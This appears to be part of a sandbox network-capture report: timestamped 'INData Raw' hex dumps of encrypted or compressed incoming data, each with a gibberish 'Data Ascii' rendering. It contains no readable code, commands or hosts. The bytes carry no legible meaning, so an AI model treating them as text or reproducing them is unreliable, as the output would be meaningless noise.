                                                                                      2023-08-04 16:48:39 UTC1110INData Raw: a8 7b 12 e8 99 09 4c 9c 95 53 06 f6 41 4e 31 c3 9c f2 41 49 71 e8 78 ff 67 98 74 e4 c7 16 a2 67 95 ff 35 1e 59 c8 35 d8 48 42 ed 17 95 66 77 73 54 47 80 95 be 64 4c 8c 74 bb bf 1e 96 72 be 02 dc f5 e8 e5 39 b5 ed 71 da 9f af 3f 5d e2 bb df e2 ea bf 43 6a 40 a8 5b 9c a1 ab 71 df 56 8c 13 d6 08 dc 75 c4 47 db f3 f6 8a f9 67 54 78 95 ee 37 9e 7f 89 49 b3 37 6b 9f fc 7a cb 6c 6d c3 db e0 42 5c 13 06 65 c7 08 ac 91 ec a6 db 66 f8 b7 79 b5 df ac a3 62 94 5f b5 12 54 d0 00 ef b7 e6 e4 8d e5 0a c9 34 81 65 6f 96 ac 65 e4 25 83 78 ee 11 e0 b3 fe d6 74 cd aa 36 0f 90 c5 d4 a6 4c 57 fd 08 ec 77 42 81 aa a2 54 c7 33 73 d9 72 f5 9e 08 fa ed 15 94 51 db c4 c3 4a 3c 6d 44 1a 8d 8f 75 db 9b c0 22 29 44 85 45 31 89 2f c6 35 5d 13 a3 64 ac 19 f9 de 60 bb 04 22 16 ee da 1e
                                                                                      Data Ascii: {LSAN1AIqxgtg5Y5HBfwsTGdLtr9q?]Cj@[qVuGgTx7I7kzlmB\efyb_T4eoe%xt6LWwBT3srQJ<mDu")DE1/5]d`"
                                                                                      2023-08-04 16:48:39 UTC1114INData Raw: 5a 75 98 44 50 f7 3d 2b ab ec fd 9b 69 25 b2 16 56 84 53 34 73 33 ff 37 5f 7d a1 ba 1a f5 48 0f 58 91 2f 0d 59 cc e1 ab 8d 84 1b 3c 7d dd 1a 0a 4b 08 66 c7 30 f5 c3 3e e6 41 40 da 2d d3 14 f8 22 86 dc ab 49 9f 71 94 35 15 b6 10 58 aa 9e 3c 70 95 01 04 47 e4 2e e4 58 31 ed eb 33 7c 89 dc e1 7d ce 5b 54 ab 3b 4e 5f 52 32 9e 08 e9 d1 4b 22 7d 4c 65 05 eb 38 c4 81 3c 1a ed 1c 05 89 29 46 3c 59 5c 01 77 76 80 16 f9 9c b9 9b 43 f4 d1 bc 9b 4c 25 da 1c 7a 79 1e c9 ed c8 52 a7 c6 85 c0 52 72 2d 97 4a 32 20 5d 7f 57 b7 b8 a5 a7 3b 15 29 1c 7d 72 8d 35 61 16 21 88 ee 37 ea d5 3a 70 0e ac 84 3f 76 01 6c f0 5d cf da 57 6d d4 65 c5 8f 79 d9 fd e8 4d 60 99 48 bd df 4c c0 cc 05 c0 40 d4 97 38 b6 2c f4 43 24 e0 75 f0 1c 70 7c 24 6d dd ea 7e 91 db 3c bb b5 26 73 ea 14 c8
                                                                                      Data Ascii: ZuDP=+i%VS4s37_}HX/Y<}Kf0>A@-"Iq5X<pG.X13|}[T;N_R2K"}Le8<)F<Y\wvCL%zyRRr-J2 ]W;)}r5a!7:p?vl]WmeyM`HL@8,C$up|$m~<&s
                                                                                      2023-08-04 16:48:39 UTC1118INData Raw: 9e 0c bc c9 58 cc fe 45 52 db 93 09 92 d8 ad 1d d8 18 25 3a 18 b3 a9 11 24 42 fb d2 34 e0 1a 8b cb de b5 38 a8 e7 79 63 94 b9 81 2c a6 e5 f3 11 7e e3 0d bf 74 57 89 86 16 1d 15 c6 ca b2 31 a1 88 aa 27 70 0e f4 b8 19 97 21 0a a5 e0 cd 72 af db b7 35 87 4e e8 ec ed 78 b8 3f 35 58 c7 d2 07 bc b7 25 a0 77 3f a5 36 93 f2 da 4b 3b 11 12 68 31 42 56 ba 29 6b 8f 9a f4 11 18 14 8d 34 57 0f 26 48 d0 f8 e1 e6 ef d0 30 80 45 c1 e3 89 39 ff 4d 13 5b 6d d1 55 49 3f d4 1a 53 ec 21 db d1 9f c1 fa a2 ee 77 4d c3 0d a9 5f f9 2d ff fa ab 72 59 98 cc 28 e7 a3 2c 0e ec ca 8a 73 a9 62 5f 41 d8 39 e3 15 9b 16 02 70 91 ae d9 2b bf 6f ca 46 b4 7b 81 c8 0f d0 bb 51 88 58 62 79 fd 54 f5 69 e3 5e ae dc eb b1 45 53 99 6d aa 77 8a e3 f3 e4 55 a7 dc 09 23 16 cb d8 d1 f0 90 38 c9 d5 09
                                                                                      Data Ascii: XER%:$B48yc,~tW1'p!r5Nx?5X%w?6K;h1BV)k4W&H0E9M[mUI?S!wM_-rY(,sb_A9p+oF{QXbyTi^ESmwU#8
                                                                                      2023-08-04 16:48:39 UTC1122INData Raw: 34 4e f0 13 73 b7 5d 0a cb 0b 6b 3d 96 67 c0 01 ce bc 4c ec 88 9c 28 01 33 fe 95 a1 c1 96 29 83 45 3d 4a 9f 9b 83 88 20 a6 d3 7e 2f f1 06 b7 4f 10 dc 2d 6e 04 14 db 97 0e d1 27 14 b2 5c 3b 77 ce 7c 9c 81 66 e4 36 0d 4c 1f cd 3f 1d bc 2c 45 8f 5d 91 03 a2 db f6 62 b3 f5 f2 25 26 9a 89 2d 38 a1 7e 65 af c9 96 3f 59 71 1f 93 92 52 c0 94 55 4d d7 6d 40 f7 22 ea 3a 6f 5c 1b 73 73 6a fd bb 20 e4 35 04 49 86 78 71 70 68 a0 a8 2c 45 30 ef 12 66 eb 88 f9 15 c8 ac 66 57 e9 93 c8 0a 68 df 26 6a 17 06 d5 e9 91 8c 6d 96 70 0e 1d bd b4 ad 01 69 69 cc f6 b6 35 b7 54 52 0e 17 c7 a6 6e 4d 58 2a a6 2e 0b 62 77 48 59 e6 b3 66 7c 9d d0 94 36 6a 9f c4 0a 18 fe 2b 73 ed d3 9a a6 17 1a c3 0d b8 31 d1 24 81 b6 5c 67 24 4b 79 ec bf f2 21 e5 fc 12 5c eb 01 de 1f dc c0 f4 86 71 08
                                                                                      Data Ascii: 4Ns]k=gL(3)E=J ~/O-n'\;w|f6L?,E]b%&-8~e?YqRUMm@":o\ssj 5Ixqph,E0ffWh&jmpii5TRnMX*.bwHYf|6j+s1$\g$Ky!\q
                                                                                      2023-08-04 16:48:39 UTC1126INData Raw: 90 a5 f8 f5 ec f8 3e 28 18 bc bc e7 23 cf aa 9e 66 31 5b f0 a8 59 24 46 74 99 f3 c1 86 1d a7 2d 62 70 33 80 3e d1 21 b0 6a b3 30 1e 6e 6b 4d ba bb 80 ad f1 fd a9 8d 82 3a 04 85 b5 54 57 8e 40 c5 0d 17 01 99 f1 7c 06 9f ac 07 df 5a 02 be 74 26 c0 93 b3 6e 60 b6 62 57 49 73 1d fd d0 f0 e2 f2 b1 7e d7 9f f0 d7 dd cc 0f d5 01 8a d7 d4 d1 60 cf 0a 08 e7 cb be f6 24 ff ac bf 0c 92 c0 cd 6e 62 42 b4 c9 e6 cd ad a2 9d f2 41 6c c4 d3 91 04 f4 c4 de d4 64 af 56 74 ea ff c9 34 11 c5 e5 a2 b6 fb d9 47 73 07 5a 53 52 6a d2 a1 7c 2a 92 46 1a 31 92 5f 25 ca f1 84 32 b2 1f 99 2c 8d 84 be c1 e2 97 6a 4b 71 85 5f 9e 5b 2a 28 2e 03 62 8e c8 b7 33 f9 c5 36 1d 08 05 56 6f d3 09 1b a4 f7 f9 4b 56 27 97 d0 f2 9e 66 75 27 5a c4 e6 be a4 11 49 ed 9d 6c f2 6e 5b 9f a6 48 b8 d6 c3
                                                                                      Data Ascii: >(#f1[Y$Ft-bp3>!j0nkM:TW@|Zt&n`bWIs~`$nbBAldVt4GsZSRj|*F1_%2,jKq_[*(.b36VoKV'fu'ZIln[H
                                                                                      2023-08-04 16:48:39 UTC1130INData Raw: ce e2 4d a2 f3 87 1f 67 a4 68 74 5c dd 07 fa d1 a7 93 5c e2 d4 ab 73 55 b0 ce ea 7f 33 d8 96 a6 48 93 4e b6 a9 d6 00 68 fe eb b1 bb 2c 12 8e 11 df 80 c2 88 f4 a7 71 92 53 73 3a 6b 08 66 c9 38 2a 26 7b f9 3c e1 2a 23 d4 1a 1f c8 2a b0 b4 9e 85 25 4f 54 db 7a 7e 3e c1 99 dd 7c dd c3 9e a1 31 51 ca 73 99 84 bb be 43 21 0d d9 cc 89 cd 66 5c 79 e7 96 12 48 ab 72 6f d9 f2 15 0f f3 e8 85 c6 1a f6 ac c0 c1 35 9b 33 e8 0a b6 0f a4 b0 73 f6 58 ec 41 b7 dc 74 f3 4f ae f8 29 74 5c 14 55 7a f5 10 ad 56 ae 16 c2 58 24 61 38 3d 7e 5d 7d 2e 34 20 ef bd 9b 01 0b 90 8a 84 98 df 8b 7d f5 dc 6e 88 f9 91 da a0 d4 05 2a 6a 3f a3 6d f0 5f e6 4d 97 d8 d5 3e ea eb 64 7f fb 22 17 3e be 90 f2 4b b9 c1 cb 78 db 61 f1 b3 13 97 7d e1 3a bb 60 1a 3d bd 47 ae 43 8e 98 50 4b e1 bb 9b 8d
                                                                                      Data Ascii: Mght\\sU3HNh,qSs:kf8*&{<*#*%OTz~>|1QsC!f\yHro53sXAtO)t\UzVX$a8=~]}.4 }n*j?m_M>d">Kxa}:`=GCPK
                                                                                      2023-08-04 16:48:39 UTC1134INData Raw: 48 c0 ae b2 6a 59 21 e4 2b 40 e4 6b 56 ff 7d 5a 4b 61 c9 f2 ae 38 50 a3 57 11 61 f4 2c 5c 0d fe 8b a0 07 8f ab fb 92 83 2e 0b 2f 81 07 3b a0 4b 88 57 cc 6f 5b 0a e3 99 a9 b9 9d c1 b5 ab fd 5e 8b 1b db 3c 88 3b 54 6e ff 8e 09 9e a1 30 46 c8 84 5e 36 10 7c 31 1e c0 d8 bc 83 3b 61 26 6a 36 a5 17 0b d6 61 e1 48 8a 23 a6 ee b5 66 2a 64 b4 86 11 bf 65 80 af 73 88 0a 91 a6 86 8f ac c7 b7 e0 94 82 2f b4 08 37 e6 1c 73 33 e4 aa 83 a9 f6 6b 41 f6 89 2e 76 f2 47 98 7b 9b 19 90 c3 1f 85 51 3f 7d 9e 89 cc 2d a4 44 77 07 63 c1 f3 67 ef 36 3f b0 20 45 33 81 47 82 e3 f3 f3 b8 be 5a de e6 49 85 15 3b 09 c3 fb 4c d6 e7 a5 0e 81 f6 72 56 ff ef f7 24 70 f5 21 85 07 94 66 10 d7 aa d1 95 0e 07 97 c9 21 67 07 86 0f ac 3c dc 83 5c ff fa 2c cd 07 c8 74 a3 91 82 6e 30 4c c8 9d 43
                                                                                      Data Ascii: HjY!+@kV}ZKa8PWa,\./;KWo[^<;Tn0F^6|1;a&j6aH#f*des/7s3kA.vG{Q?}-Dwcg6? E3GZI;LrV$p!f!g<\,tn0LC
                                                                                      2023-08-04 16:48:39 UTC1138INData Raw: 8e 85 c2 aa 09 a4 08 c3 32 c9 56 d9 cb 73 a2 fa d5 56 95 96 4b 46 82 95 2f a5 29 48 68 23 48 1f 1a 7a 99 fa fa 81 5f 0c ca d8 54 09 c1 76 bd 0a 0d 94 01 34 b4 7c 2a 82 19 7e 8e 64 2b a9 3e 92 6c 04 a3 69 c5 72 21 11 8b fd 2f da 53 0c 57 d1 a5 9a 82 72 87 5e 2f 4c 45 0f c1 ab 4d 15 0e 7b fe 4d 25 8e 99 fc 05 06 b1 7c 6e 55 ae eb a0 e6 86 23 0c 00 35 ef f7 18 e3 43 49 7f 81 5b 08 cc 90 a7 06 33 4d 81 c7 f7 0c 36 28 ed 70 d6 cc db 3f 54 62 e8 fc 84 e5 4f 5e 81 1a 43 3b ae 3f f6 2b 33 9f a1 b4 7d b2 cf bc 20 dc 8e 4a e8 5e ce 5c fa 1b 61 77 1b e3 c2 34 bd e5 72 4c f2 3e 84 24 40 9f 7f 78 24 1d dd 80 a6 27 73 8d 6a 9c fb 0d fd 1e 87 a9 cb db 3d 59 ba 60 72 92 e9 b3 e8 bc d3 4c b0 c9 4a 43 44 92 f8 6c 6b 75 e9 af d8 01 46 00 2f 54 07 4a d4 58 f6 bf 4a ac fe d6
                                                                                      Data Ascii: 2VsVKF/)Hh#Hz_Tv4|*~d+>lir!/SWr^/LEM{M%|nU#5CI[3M6(p?TbO^C;?+3} J^\aw4rL>$@x$'sj=Y`rLJCDlkuF/TJXJ
                                                                                      2023-08-04 16:48:39 UTC1142INData Raw: 05 66 f8 8f 88 45 89 a8 42 44 3f 03 40 12 ec f3 65 4e cc c5 22 8a d0 d7 f5 f9 d5 f6 48 65 b8 d1 80 30 00 de 35 94 31 40 d4 89 30 71 17 7d ae f6 c2 2d ad 09 f2 18 cc e2 44 75 c8 38 cb f3 6c aa 93 70 80 83 59 b5 5e e4 c2 a4 32 1e ad 91 8b f8 e3 67 c1 9a 00 d9 d0 9f f9 2d 86 59 d6 9d fa f2 75 58 56 81 85 b7 aa d8 d3 1e ba 2e 5e ab 10 11 44 d3 f7 c0 42 b2 fc 8d c4 90 95 c3 57 20 89 9c 13 0d 07 90 33 53 da 50 ac ae 68 7b 56 61 b5 06 31 2d 5c 51 54 18 cf 8a af c9 56 d5 f3 b9 b3 bf 2e 30 80 66 7a 54 e7 08 ab 1b 9b 26 d8 bf da 3f 64 36 da fa ba 67 83 3b 2b b7 92 7e 27 78 ef eb 66 61 ae d2 5d b2 a0 62 a0 59 b3 bf a0 65 67 57 41 dc 04 23 6b 17 ce c2 79 c9 85 62 17 4f 0e 76 cc 4f 08 5d 8d 42 79 87 74 2a 4a 5d 5a 60 da a6 a4 e0 bd cd 2e 26 54 d2 7a ee d8 ce b4 7d ac
                                                                                      Data Ascii: fEBD?@eN"He051@0q}-Du8lpY^2g-YuXV.^DBW 3SPh{Va1-\QTV.0fzT&?d6g;+~'xfa]bYegWA#kybOvO]Byt*J]Z`.&Tz}
                                                                                      2023-08-04 16:48:39 UTC1146INData Raw: 44 fa 0b 6b 93 e4 56 6e 87 2d bb ab 84 e1 b4 b9 9c 34 86 f1 d3 10 28 b6 c6 54 dc c2 98 49 82 28 43 c1 76 f0 91 6f d7 73 44 5a 6c 88 3b 1b 2d c5 aa 52 81 b0 34 b6 13 81 09 00 dd df 7d 43 11 02 18 9f f3 71 7a 52 de f5 1f 29 49 8c a9 a6 f2 98 6c 54 22 f8 e0 22 24 cd ae 0f ea 0c 4d ae 7c 49 ed ad 99 64 85 6f 54 2e 1f ab 1e 4b bc 53 a5 d0 3e 4c 80 60 b1 1b f9 0c e8 1f f3 d1 62 a2 bc cd d5 a1 57 f7 3a 3c f0 f7 1e 5c ff 74 9d 9e 51 3d 5c 7c d5 23 34 7a 3c 65 c6 ad 97 12 95 a7 99 15 27 70 69 75 e4 fc 97 ae a6 93 2e 8c ae 5b b3 75 7e e0 3b d2 07 7d 6c b1 e4 21 1f f8 a3 5b 26 36 9c ec 32 4a 6d 7d 0a 29 0f 6d bf d5 7e 9c ca cd 69 72 03 86 ab a8 76 49 26 55 e7 fe 9f 4a cf cb 8a d6 f9 d6 19 7c cd 52 93 fa 1f f2 f2 89 df e3 5d 26 3d b4 e4 9d 85 3b 73 70 63 69 62 42 f2
                                                                                      Data Ascii: DkVn-4(TI(CvosDZl;-R4}CqzR)IlT""$M|IdoT.KS>L`bW:<\tQ=\|#4z<e'piu.[u~;}l![&62Jm})m~irvI&UJ|R]&=;spcibB
                                                                                      2023-08-04 16:48:39 UTC1150INData Raw: b6 0f 9b 82 7d 3e 03 5b d6 f5 7b 65 f2 f4 eb b5 02 9f e5 db a7 c8 a0 14 50 b3 a7 49 37 76 bb 2a e0 5e b2 5d 78 e8 b2 15 d7 b4 b6 4f db 7c 7a b9 78 16 ea 10 86 2d 0d f4 b0 d0 c6 20 10 62 4b 00 3c 91 8b d5 93 8b cd 4a 2d 7d 03 f0 9e 2a a0 46 13 61 df 9b de 2e 7c e1 6b bd 19 fe 1e cc b8 48 b0 68 57 9e c7 f3 af 67 f2 70 35 57 fa ec de 30 9e d1 87 0a ea 23 33 f6 28 be b1 3c a1 35 2c 23 72 ab fa 17 51 3a bb cb f2 64 c4 21 c5 7f cd a6 7e e5 20 28 e7 96 a6 60 5a ed f5 a1 b0 63 88 1a 58 8e e0 a1 a8 e4 ae 1a 7a b3 e8 77 3a 2e 99 57 50 cc 58 ed 96 6e 0e 81 92 8a 9a 21 ef 8c 22 d3 8a f2 cc 2c ca 39 ab 85 11 fa 19 21 e3 96 03 ec af 61 7c fc ad 3b a5 45 26 1f 2e 12 95 32 76 9e a4 00 0b b3 fb f4 c7 14 a4 85 4d 69 f4 80 1c 9f 83 e6 2f 3b df fd 19 fb c8 7a f5 c5 00 10 22
                                                                                      Data Ascii: }>[{ePI7v*^]xO|zx- bK<J-}*Fa.|kHhWgp5W0#3(<5,#rQ:d!~ (`ZcXzw:.WPXn!",9!a|;E&.2vMi/;z"
                                                                                      2023-08-04 16:48:39 UTC1154INData Raw: c5 1e 05 5c 5b 8e 89 0e d2 c5 66 99 42 5d 63 fd 60 14 57 6d f4 e3 f9 8b 02 d2 1b e5 13 95 f0 d5 27 56 f2 eb f1 05 ad b9 a8 29 5c 8f 94 6a cd 1b e2 2f b9 ae 1b d5 ad 24 dd 05 4c 74 43 e6 bd 1a da 09 3b df 04 fd 30 fd 0d 20 c7 67 35 4d 80 be 3d fd 7a eb 2d a1 4c 0c 44 0a 9b 05 16 4f 83 9e 78 f9 13 7c ea f9 e1 6d 56 9b dd 79 60 03 22 50 25 1e f3 aa 74 21 8c 1d 91 55 60 d6 59 c1 9d 66 19 f6 71 97 c9 9a a7 4a 64 aa 63 8c bb 21 85 db d4 ae ea 37 8a 59 a1 90 11 17 48 67 e9 4e 85 40 b9 93 c3 11 98 59 1f eb 5c ad b7 07 1d f4 ab 53 76 00 9f 4c 3a af 22 00 54 22 5a 79 de f4 7a b4 64 94 b5 e8 d9 ad ec ff 3e 55 fd 5d 19 93 89 99 47 49 e7 a9 df 8e d3 f0 d0 45 3b b7 5f c5 f4 da a8 14 4c 80 cd 7e 48 d3 59 01 75 92 b2 48 98 8f 0e 61 f3 26 c4 e6 28 b1 1f ba 43 a9 69 c2 07
                                                                                      Data Ascii: \[fB]c`Wm'V)\j/$LtC;0 g5M=z-LDOx|mVy`"P%t!U`YfqJdc!7YHgN@Y\SvL:"T"Zyzd>U]GIE;_L~HYuHa&(Ci
                                                                                      2023-08-04 16:48:39 UTC1158INData Raw: f7 7a 36 41 48 9f 6b 0d 5a 0f 5d 45 ca 31 8f 7f 54 11 de 46 a8 25 2e 4d 70 64 4c 0a 9b 51 c2 d8 8e 73 e2 53 6e 31 14 4c 38 55 a4 c1 5c 97 5c ff c9 b0 db 64 fd 97 d3 bb 16 19 57 fb da 25 bd 26 81 7b 3c 7c 15 d7 c2 10 86 89 2a c3 49 77 88 a7 2f 9d 5c 5e 9a 9e 8b 12 6f 65 b2 02 a0 a3 5f e6 91 f5 01 af d3 91 ed d1 54 df 24 0e 22 4a b0 89 af 55 90 98 47 a9 61 fc c1 dc 0c 37 1c 68 be 1a 3f 3f 23 47 71 6f 99 8a 20 8d d5 ea dc 6d b6 55 1e 33 ed 40 4d a2 60 8a 4f 6a 9d 53 34 b7 9e 4b 1c 51 7c af e5 15 ad 5e 5f e3 42 01 4d c0 97 27 8f 32 76 f1 e7 0c 8a b5 7b c9 59 52 68 28 08 46 df 8e b8 1d fb 5e 86 f2 7f af b4 c6 84 d4 f1 54 e6 1c ae 93 6e 25 c8 a5 21 06 e5 24 6c 25 aa d4 8e 6c ca d7 02 35 f7 b4 de 1c 8c 94 6a 5d 82 01 aa 5e 62 32 be ac 64 73 e8 59 f0 7f 97 cf eb
                                                                                      Data Ascii: z6AHkZ]E1TF%.MpdLQsSn1L8U\\dW%&{<|*Iw/\^oe_T$"JUGa7h??#Gqo mU3@M`OjS4KQ|^_BM'2v{YRh(F^Tn%!$l%l5j]^b2dsY
                                                                                      2023-08-04 16:48:39 UTC1162INData Raw: 57 d6 28 80 3f e0 d8 99 cc 01 f2 61 56 97 43 31 4b 51 b0 72 dd 14 56 55 41 2f 1f 5d 1e 05 16 ba 2a 8a 20 a9 2c f9 09 98 c1 da f7 f2 c4 3b a3 db 6d d2 76 c8 e0 ba cd 38 74 36 67 e4 57 4c 66 da e5 2b 6e 28 16 e1 d7 f8 96 ae db 91 96 7f 32 a4 d5 2a 32 7c 46 d9 3d 1d 67 db 22 9b a0 28 fa 1e 07 43 4f 8b 00 cf e9 76 83 58 c5 a2 20 e3 e3 34 a6 df e1 db 7b 55 fa 16 22 af 53 2a c9 be 31 f5 05 71 39 b5 8c b4 9a 6a 18 d9 7f 44 2d b4 9a c3 73 9e 89 2f 61 2c fb d3 2f e9 3f 47 c1 b6 ed 1c fb d4 7d e6 11 54 dc 97 07 86 72 0e 63 21 78 64 f5 74 b8 48 f7 2d 95 0d 36 56 30 7d 1a d8 35 24 e6 8f b0 e9 17 4f 6c 96 84 fb 76 d1 f7 93 ea 1f 12 d5 f7 e8 93 bb 2e 5e e1 5c d9 c5 79 ff df f4 3b 22 40 c5 e1 d2 88 55 02 26 37 41 25 4e 23 ae bd fa ba f8 9f c4 dc dc 80 14 b5 91 8b 42 bf
                                                                                      Data Ascii: W(?aVC1KQrVUA/]* ,;mv8t6gWLf+n(2*2|F=g"(COvX 4{U"S*1q9jD-s/a,/?G}Trc!xdtH-6V0}5$Olv.^\y;"@U&7A%N#B
                                                                                      2023-08-04 16:48:39 UTC1166INData Raw: db 4b e0 30 62 56 63 ee 5c 3b 30 fe f9 9b 7f 95 60 98 4c e7 b2 27 5e cb 70 05 39 63 8f 6e 40 1f eb 11 cb aa 87 16 57 02 6c 14 b6 a3 f2 29 dd f0 5f aa a8 f0 55 e7 53 3b 34 d7 31 e0 78 c6 dd 5f 16 1e 93 6b a2 ed ea bd 51 07 4d b0 41 4d 17 7a ab c6 0d 01 de a4 5e 93 3e 5c 23 58 34 2b 2a 4d 4a 60 17 e6 e3 5e 9e cb 90 2b e7 27 db 4e a0 cd 42 ce 36 3f f4 a8 0d 9e 59 fa 7e 7c f8 5a 95 60 a7 77 e8 88 56 70 99 46 a2 8b 42 3d b9 39 98 5a 95 1e a6 ef 9e f0 d8 80 a4 9f 50 01 52 b3 35 a3 79 81 fa e3 82 cf 6e 72 c3 90 d0 7b 0a 6f 82 9e 01 12 16 33 39 54 38 5e e6 7b 89 2a 15 84 5f c5 0a d4 af 6e 14 06 a7 92 03 78 d6 24 4c a0 8e d0 87 30 20 36 43 7b bd 8c 32 97 5c eb a9 2b fd 7b c5 bf 5c bf fd 7e d8 71 b8 f7 92 01 99 70 2d 3c 41 f0 36 6f 7a 3b 32 cc 90 a1 e5 75 80 d3 7a
                                                                                      Data Ascii: K0bVc\;0`L'^p9cn@Wl)_US;41x_kQMAMz^>\#X4+*MJ`^+'NB6?Y~|Z`wVpFB=9ZPR5ynr{o39T8^{*_nx$L0 6C{2\+{\~qp-<A6oz;2uz
                                                                                      2023-08-04 16:48:39 UTC1170INData Raw: cd 58 25 df a5 1e 69 37 95 2e 24 05 ca 60 87 c9 72 25 a4 4d e8 c9 69 0d 8e 62 ab 86 38 19 4a 8a 3c ad 35 5d 51 56 7e e1 5e 9d 36 51 f5 ec 0f 51 f4 9b 06 ac b4 c3 4f a7 8f 15 ca 5c ca 28 86 f6 9c 77 8b 94 cc 95 dc fe e7 9c cc 40 b1 1d c5 c9 6f 9e 68 6d 53 5d 9b c1 16 c9 3c 6a 2e fe 72 10 f1 1c f3 cd 68 a8 bc d4 84 af 6c 4e 2a 22 95 e9 92 8f d0 6d 83 cc e6 f4 43 06 31 08 ce 21 08 e2 bb ee 15 66 f8 88 3c ac 91 bf 79 c1 29 e9 87 dd 9e 73 83 29 44 6d 73 92 27 2c f2 fc 05 00 3f c9 6d 32 34 9a b4 89 33 6c 6b d3 47 86 f7 d9 28 e0 dd 03 6a 6b a9 84 43 79 5e 3c f4 6d de b7 e9 91 7d 74 5a 64 21 15 3d 81 ec 9e f4 c0 a3 33 4a 71 60 68 10 03 02 ee fa 11 9d 90 d8 e0 76 64 9a 98 24 53 d1 21 87 e3 69 75 1a 8a 9c 81 4b eb 03 60 4b 7b a3 b3 b5 73 e4 d7 9f 47 fe 33 57 7a 6a
                                                                                      Data Ascii: X%i7.$`r%Mib8J<5]QV~^6QQO\(w@ohmS]<j.rhlN*"mC1!f<y)s)Dms',?m243lkG(jkCy^<m}tZd!=3Jq`hvd$S!iuK`K{sG3Wzj
                                                                                      2023-08-04 16:48:39 UTC1174INData Raw: 8e a6 a1 05 ed 52 cd 36 4f 6f bd 30 b9 92 de 9a d1 f0 d8 fa 5f 6e 92 e3 22 90 f8 3c 64 3c 71 56 ec 2f b6 7a e4 4c bd 07 42 b1 00 3d d2 e4 78 7f 36 5f ee f6 cf 95 53 19 fc 51 80 c6 b0 8c 34 f6 db 30 af e6 45 a8 a4 8e d1 61 f2 64 b4 ed 6e a4 ae 56 dc d6 60 ec ed 92 22 20 97 90 d7 4d 88 76 5a 59 c6 cd 71 c6 ad 30 96 9f c3 46 5a e2 12 1d d8 b5 6c 6b fd b7 73 39 37 9e de 84 ae 69 1a e1 e1 c3 4d de 1f 0a 27 13 c0 37 00 ac fd 96 23 a6 1a 0a 7d a0 bc 5f 83 e6 b1 f2 7c a8 c3 53 47 26 79 dd a3 14 93 c9 dc 63 1d 99 74 28 7f 65 69 2e 30 2b dd ac d0 aa f1 e2 0a 22 7d ee 17 3d b7 93 67 e1 7d be 41 29 92 e9 25 4f 13 7a 2c d0 04 75 04 7c f1 83 43 3f 29 45 44 08 87 f3 24 67 6f 7e 2f 6b 5e 22 a8 1c 85 a5 6e 10 2a 82 4a af 41 b6 4a f2 44 e5 32 73 36 84 ee 99 a7 45 c7 25 cc
                                                                                      Data Ascii: R6Oo0_n"<d<qV/zLB=x6_SQ40EadnV`" MvZYq0FZlks97iM'7#}_|SG&yct(ei.0+"}=g}A)%Oz,u|C?)ED$go~/k^"n*JAJD2s6E%
                                                                                      2023-08-04 16:48:39 UTC1178INData Raw: 55 41 d0 f8 42 4a 97 41 00 ef a3 3e 7f c8 1a 12 e4 bc 87 45 ed df 94 4c 7e 27 49 27 7e 0f a4 b7 02 8a 59 5a 09 e8 c7 b8 14 96 20 24 ab ed 39 48 81 45 fe 82 7f cd 58 85 a6 b8 52 50 64 76 9c e8 f6 85 6e 8c 1d 99 cc 59 86 db 0e f4 36 ac d8 f6 13 46 08 bc c8 35 1a 8b 88 d3 7d 9d 63 96 24 95 66 c8 70 0a 81 5a ea b6 2e b7 2a be 65 97 9b 1e f4 ba 29 32 40 50 6a 73 e2 54 9a 9f 20 d4 0e 5f ff 06 7e 36 25 6d af 34 c5 12 f7 bd b4 9b 55 3c 69 ec 0c 0f 16 fc 5f a3 33 b4 79 bb ed 1e a0 70 2f 8b 49 37 c7 e0 d3 7f 53 94 b1 41 ff c6 17 05 91 34 55 3e d9 04 1f 84 44 2a f2 a9 71 2b 6d b3 43 4a f6 22 98 87 6e 92 cd 85 b1 57 23 bc b3 d5 df f6 5d 55 ac 9e a4 78 6d 53 c8 c6 5e ea aa da aa 35 c7 d6 24 e6 4a a9 29 7d 1c 6c c4 98 fe da 76 ba e5 c7 05 c3 7c f3 3f 39 8d 9f 44 ea 04
                                                                                      Data Ascii: UABJA>EL~'I'~YZ $9HEXRPdvnY6F5}c$fpZ.*e)2@PjsT _~6%m4U<i_3yp/I7SA4U>D*q+mCJ"nW#]UxmS^5$J)}lv|?9D
                                                                                      2023-08-04 16:48:39 UTC1182INData Raw: 3f 0a fe f8 ee 95 3b 48 de bd ef e5 29 a7 3f b5 04 66 f9 39 86 5b ac d9 23 ee 8b 95 d7 28 b0 bf ea ad d2 91 d4 a1 f2 2e 26 7c 83 4a 93 88 f7 50 0a 35 4b 6b 49 a3 6c 88 54 30 34 95 5e 44 86 8e 56 45 fa f6 5d f6 ac fe df 99 2e f5 2b 32 46 80 ec 27 36 63 a4 d8 88 63 15 05 64 1c b2 73 4c 97 59 2e f0 b9 49 55 c1 7b ee 6c 27 0f 0c be dd 7d 32 4d d5 0c 8b 22 c9 6e d7 fb 7a 07 da 65 6a a0 56 4e 2f bc 54 ef b7 33 b0 92 a0 53 72 f7 e2 93 15 eb 68 bc be 24 b6 64 13 ce 52 63 ac 4a 00 ad 31 fd 6c 1d 29 7a 3b 8c 4b d7 39 d9 5b c0 51 f5 4a 8e 18 b2 f7 86 a2 6e ca e8 cc 77 85 2e c0 a4 58 99 7f c8 11 c5 6d bd d7 f1 fa b4 ca 11 06 d7 9d ce 5c 32 95 a9 73 3d a5 9d a3 48 47 20 ee 68 dd a8 5d 84 70 56 6a ad 8f 48 e4 87 1e d5 f3 59 c7 45 d8 47 2d 5a be fb 9d c3 62 62 00 c5 30
                                                                                      Data Ascii: ?;H)?f9[#(.&|JP5KkIlT04^DVE].+2F'6ccdsLY.IU{l'}2M"nzejVN/T3Srh$dRcJ1l)z;K9[QJnw.Xm\2s=HG h]pVjHYEG-Zbb0
                                                                                      2023-08-04 16:48:39 UTC1186INData Raw: e1 df 44 c2 13 12 da 4b 25 31 95 d6 81 92 d6 06 b4 ac 0b 82 a8 c8 d9 d2 a2 ff ba c3 08 68 36 e8 82 aa 8f 09 e1 82 6d 26 ae 6e 35 20 a4 b9 c1 59 bf aa ba 0d e5 a7 b5 83 e6 6f 6a 17 01 36 53 0b 5a 42 30 02 c4 25 e3 39 ac b8 1c 69 43 1b 61 f4 de 56 1b 63 90 b2 26 2b 43 60 1d ea 6a 68 88 75 0e f3 8f 63 c5 51 98 53 68 19 a3 54 e9 42 65 24 29 e9 1a 7f 78 b1 96 a8 1c 35 9e c2 1b 43 a2 69 f8 81 6b 56 ea bf b2 d2 1f 45 bd 83 92 98 e1 00 d0 d6 3e 15 32 35 47 38 49 f9 e7 ba 46 f0 01 6c 82 ac 4d e8 00 e5 21 af d3 d3 3b b8 ad c7 17 99 76 f1 e2 fe c9 33 7a d8 5c 6f 01 